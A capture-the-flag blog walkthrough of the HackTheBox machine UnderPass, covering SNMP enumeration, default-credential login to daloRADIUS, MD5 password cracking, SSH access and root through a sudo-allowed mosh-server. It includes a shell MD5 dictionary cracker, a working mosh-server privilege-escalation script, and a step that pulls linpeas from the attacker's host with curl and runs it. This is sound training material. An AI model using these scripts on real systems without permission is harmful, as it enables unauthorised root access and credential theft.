HackTheBox – UnderPass Walkthrough

It’s been a bit since I’ve posted any walkthroughs, so here we are back with an easy machine called UnderPass.

I use my own Kali VM to attack from and connect through VPN to the HTB network. You can do that or use one of their attack boxes. I prefer my own as I have a lot of notes, exploits, and other files saved on my personal Kali VM instance.

After booting up my Kali VM and connecting to VPN, we’ll boot up the UnderPass machine and start scanning.

As is standard, we’ll get an nmap scan fired off to see what network ports are open on the machine.

Initial nmap scan

Our initial nmap scan shows a web service on port 80 and SSH open on port 22.

We’ll add underpass.htb to our /etc/hosts file for easy name resolution.

modifying hosts file

Now, navigating to the website, we can see the default Apache page.

Default Apache page

Nothing to see there, so let’s do some directory fuzzing with ffuf.

ffuf
results

None of these are accessible; each one returns a 403 Forbidden. So, let’s take a step back and run a different type of nmap scan. Our initial scan was TCP only, but maybe there’s something we’re not seeing over UDP. We’ll use the -sU flag and limit it to the top 100 ports (--top-ports 100), since a full UDP sweep is slow.

UDP scan

We can now see that SNMP (161/udp) is open, as well as RADIUS (1812/udp).

So, let’s enumerate the SNMP service to see what we can find.

First, we’ll use snmp-check with the -c Public option.

oof

Oof, it would have worked if I had used the correct capitalization: SNMP community strings are case-sensitive, and a quick review of the Kali docs shows that ‘public’ should be lowercase. Let’s try that again.

snmp check results

Not a ton of information, but I do see a user. Maybe we can use that later? I’ll keep it noted just in case. Additionally, the hostname output says that this is the only daloradius server in the basin. I have no idea what that means, so let’s do some Googling on it.

In the meantime, we’ll use snmpwalk to see if there’s anything snmp-check missed.

snmpwalk results

I spent a bit of time searching for Daloradius. I was able to find this article on installing Daloradius that shows the default web path to the service as well as what appear to be default credentials.

Daloradius directory

Trying to visit this directory returns a 403 Forbidden. A 403 on a directory usually means it exists but directory listing is disabled, so the endpoint is there, somewhere, one level deeper. Let’s see if we can find it with ffuf, this time fuzzing underpass.htb/daloradius/FUZZ.

more ffuf

We’ll keep iterating through these subfolders until we find what we’re looking for. So far we know there’s /daloradius/app/. Next, we find users and navigate to that in the browser.

It redirects us to the users login endpoint. Let’s see if the default credentials work here. I used the creds from the install guide above, but they did not work.

daloradius default creds

A quick Google search gave me these creds. However, these still do not work.

Ok, when in doubt, enumerate out. Let’s do some more searching, this time with dirsearch.

dirsearch
dirsearch results

We found another endpoint, this one called operators. ffuf did not find it, likely because of the wordlist I used, which is a bit of a bummer. However, I’ve often found that switching tools and wordlists helps when you get stuck.

operators login

Same login page but /operators/ endpoint instead of /users/. Let’s try those default credentials again.

daloradius page

We are in!

Here, I spent a little time browsing the site and taking note of anything interesting. In the config section there is a Database Settings menu that shows a username and password for their MySQLi database. I’ll note those for future use, if needed; database credentials found in a web console are always worth trying elsewhere.

Additionally, I noticed there is one user listed on the main page. Clicking through to the user list shows what appears to be a hashed password for that user.

user hash

We can take that hash and crack it (or look it up) to recover the password; it is an unsalted MD5 digest, which falls to a wordlist in seconds.

MD5 hash
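As an added example (not code from this post or from daloRADIUS), here is a small POSIX shell dictionary attack against an unsalted MD5 hash like the one shown on the user page. The hash and the three-word wordlist are constructed for the demo, not the box’s real user or password; the point is that an operator who can see an unsalted MD5 of a user password can recover it offline with nothing more than md5sum.

```shell
#!/bin/sh
# Added example, not from the original walkthrough.
# Offline dictionary attack on an unsalted MD5 hash of the kind daloRADIUS
# displayed for its user. All inputs below are constructed for the demo.

# Hex-encode the MD5 of stdin; md5sum on GNU/Linux, md5 -q on BSD/macOS.
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum | cut -d' ' -f1
    else
        md5 -q
    fi
}

# Classify a bare hex digest by its length (unsalted MD5 is 32 hex chars).
hash_type() {
    case "$1" in
        ''|*[!0-9a-fA-F]*) echo unknown; return ;;
    esac
    case ${#1} in
        32) echo md5 ;;
        40) echo sha1 ;;
        64) echo sha256 ;;
        *)  echo unknown ;;
    esac
}

# crack_md5 <hex digest> <wordlist file>
# Prints the matching word and returns 0, or prints nothing and returns 1.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        # printf, not echo: echo would append a newline and change the digest.
        digest=$(printf '%s' "$word" | md5_hex)
        if [ "$digest" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Demo with a constructed wordlist. 5f4dcc3b5aa765d61d8327deb882cf99 is
# md5("password"); the real hash from the box is deliberately not used here.
wordlist=$(mktemp)
printf 'letmein\nunderpass\npassword\n' > "$wordlist"
echo "hash type: $(hash_type 5f4dcc3b5aa765d61d8327deb882cf99)"
crack_md5 5f4dcc3b5aa765d61d8327deb882cf99 "$wordlist" || echo "not in wordlist"
rm -f "$wordlist"
```

For a real engagement you would feed rockyou.txt to hashcat (mode 0) or john instead of a shell loop, but the logic is identical: unsalted MD5 lets the attacker hash candidates once and compare, so the defence is bcrypt/argon2 storage, not a longer wordlist.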

Now that we have the password, let’s try this username and password against the SSH service.

ssh login

We now have user access to the box and the user flag is sitting in our current directory.

User flag has been captured. Now, let’s work on privilege escalation to get the root flag.

We’ll use our trusty LinPEAS script (Linux Privilege Escalation Awesome Script). It’s a super useful tool that scans the system and looks for possible ways to gain root. There is also a Windows version called WinPEAS.

I’ll host linpeas from a local folder on my attack machine with Python’s built-in http.server module, then from the victim machine use curl to grab and run the script.

hosting the simple server

Above, I’m running the simple HTTP server, and you can see the incoming GET request for linpeas.sh.

curling linpeas

Here, you can see the curl request to my attack box for the linpeas script, followed by running it.

svcMosh

After a bit of running, we can see the output of a simple ‘sudo -l’ command: the svcMosh account can run /usr/bin/mosh-server as root via sudo.

Do I know what mosh-server is? Nope! After a bit of searching for what mosh-server is and how to do privilege escalation with it, I found this Medium article super handy. By the way, did I mention how much time I spend Googling during these machines? There are so many different tools, software packages, and exploits out there that Google becomes super useful.

running mosh-server and escalating

Above, we run mosh-server and then, following the article, take the key it prints and connect with the mosh client locally. This drops us straight into a root shell. Just as a side note, this took me SEVERAL tries. For some reason, when I was copying the key after starting the mosh server, it was not connecting. I’m not sure if it was how I was pasting or if I was accidentally copying a space. So, if it doesn’t work the first time, be very careful how you copy and paste.
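As an added example (not from this post or the Medium article it cites), here is a small POSIX shell wrapper for that step that never relies on copying the key by hand. It assumes the sudo rule shown above (svcMosh may run /usr/bin/mosh-server as root) and that mosh-client is installed locally on the box; it parses the ‘MOSH CONNECT <port> <key>’ handshake line that mosh-server prints on stdout and passes the key to the client through the environment.

```shell
#!/bin/sh
# Added example, not from the original walkthrough.
# Escalate via a sudo-able mosh-server: the root-owned server hands out a
# session key on stdout, and whoever presents that key to it over UDP gets
# the root session. Assumes: sudo permits /usr/bin/mosh-server as root and
# mosh-client exists on the same host.

# Read mosh-server output on stdin and print "PORT KEY" from the handshake.
# The line is CRLF-terminated, so strip \r first or the key carries a
# trailing carriage return and the client handshake fails.
parse_mosh_connect() {
    tr -d '\r' | awk '$1 == "MOSH" && $2 == "CONNECT" { print $3, $4; exit }'
}

# Start the server as root and attach to it on loopback as the same user.
escalate_via_mosh() {
    connect_line=$(sudo /usr/bin/mosh-server | parse_mosh_connect)
    if [ -z "$connect_line" ]; then
        echo "no MOSH CONNECT line from mosh-server" >&2
        return 1
    fi
    port=${connect_line%% *}
    key=${connect_line#* }
    # mosh-client takes the key only from the MOSH_KEY environment variable,
    # never from argv, so it does not show up in `ps` output.
    MOSH_KEY="$key" /usr/bin/mosh-client 127.0.0.1 "$port"
}

# Usage on the box (not invoked here so the file can be sourced safely):
#   escalate_via_mosh
```

Two caveats a practitioner should keep in mind: mosh-server gives up if no client connects within about 60 seconds of printing the key, so the connect must follow promptly, and by default it binds a UDP port in the 60000 range on every interface, so during that window anyone on the network who obtains the key can attach to the root session, not just the local user.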

root access

Now that we have root, we can simply grab the root flag and finish this machine.

This was a pretty interesting one! I’ve not messed with mosh-server or Daloradius before, so these were two new services to me that I had a blast exploiting. I hope you enjoyed the walkthrough, and I’ll see you again on the next one!
